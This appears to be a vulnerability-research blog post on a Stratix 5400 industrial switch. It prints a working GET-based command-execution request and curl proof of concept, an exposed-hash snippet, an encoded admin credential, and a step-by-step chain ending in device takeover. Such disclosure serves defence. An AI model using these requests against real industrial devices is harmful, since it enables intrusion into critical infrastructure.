ICS SecurityResearchVulnerability Research

Critical Vulnerabilities in Cisco Stratix 5400: GET-Based RCE and Complete Attack Chain

Executive Summary

While playing around with a Rockwell Stratix 5400 industrial Ethernet switch, I uncovered a series of vulnerabilities that, when chained together, allow complete device compromise with minimal effort.

Key Findings

VulnerabilityImpactExploitability
GET-Based RCE (No CSRF)Full command executionTrivial - single HTTP GET
CSRF to RCEUnauthenticated → RCE via CSRFEasy - malicious webpage
Password Hash ExposureComplete credential disclosureTrivial - view HTML source
Privilege Escalation ChainRead-only → Admin escalationEasy - hash cracking

Cisco Stratix 5400 Industrial Ethernet Switch - commonly deployed in critical infrastructure

Background: The Cisco Stratix 5400

The Cisco Stratix 5400 is an industrial-grade Ethernet switch designed for harsh environments including manufacturing facilities, utilities, oil & gas operations, and transportation systems.

Target Device Specifications:

  • Model: 1783-BMS10CGP

Critical Finding #1: GET-Based Remote Code Execution (No CSRF Protection)

The Vulnerability

The web interface exposes a GET-based command execution endpoint that accepts arbitrary CLI commands without CSRF token protection:

Endpoint: /%24{variable}%0A?{variable}=<command>
Method: GET
Authentication: Required (HTTP Basic Auth)
CSRF Protection: NONE

Technical Details

The endpoint uses URL-encoded variable substitution:

  • %24 = $ (dollar sign)
  • %0A = \n (newline)
  • Any variable name works: a, b, c, d, cmd, command, etc.

Working pattern discovered:

GET /%24b%0A?b=show%20running-config HTTP/1.1
Host: 192.168.103.143
Authorization: Basic YWRtaW46U3RlcGhlbjEz

Response: 200 OK
Content-Length: 4700
[Full device configuration with passwords]

Proof of Concept

curl -k -u admin:password \
  "https://192.168.103.143/%24b%0A?b=show%20version%20|%20include%20uptime"

# Returns:
stratix uptime is 11 hours, 42 minutes

Confirmed Working Commands

CommandOutput SizeSensitive Data
show running-config4,700 bytesPasswords, SNMP strings, network config
show startup-config3,354 bytesSaved configuration
show version2,921 bytesIOS version, serial numbers
show users142 bytesActive sessions
show ip interface brief820 bytesNetwork topology
dir flash:1,113 bytesFile system contents

Critical Finding #2: CSRF Leading to Unauthenticated RCE

Because the RCE endpoint uses GET requests with no CSRF token, any webpage can trigger command execution when visited by an authenticated administrator.

Attack Scenario

  1. Attacker creates malicious webpage
  2. Sends link to network administrator
  3. Admin clicks link while logged into switch web interface
  4. Malicious JavaScript executes commands in admin's browser context
  5. Full device configuration exfiltrated to attacker's server

Critical Finding #3: Password Hash Exposure

The useraccounts.shtml page includes a hidden textarea that contains the output of SSI commands, exposing all user account password hashes in the HTML source code.

Vulnerable Code

<textarea style="display:none; visibility:hidden;" id="USER_SUMMARY">
    <!--#exec cmd='more system:running-config | i user'-->
</textarea>

When rendered:

username admin privilege 15 secret 5 $1$P4Bi$8t74cAAknpCiVCvL7IC6T.
username vulntest privilege 5 secret 9 $9$wLzi8Cmi6aH91k$qOAH1kOzmLhTX1tKqGx/...

The Complete Attack Chain

Phase 1: Initial Access

Attacker obtains read-only credentials (default/weak passwords)

Phase 2: Information Disclosure

Access useraccounts.shtml → extract admin password hash from HTML source

Phase 3: Offline Password Cracking

Run hashcat on MD5-crypt hash → cracked in ~15 minutes with GPU

Phase 4: Admin Access

Login with cracked admin credentials → full web interface access

Phase 5: Remote Code Execution

Use GET-based RCE endpoint → extract all configuration, passwords, network topology

COMPLETE DEVICE COMPROMISE

Disclaimer: This assessment was performed on authorized equipment for security research purposes. All findings are reported in good faith to improve security.

This post is part of my ongoing ICS security research. For more projects and research, visit the ICS Projects page.

#ics#vulnerability#cisco#stratix

Related Posts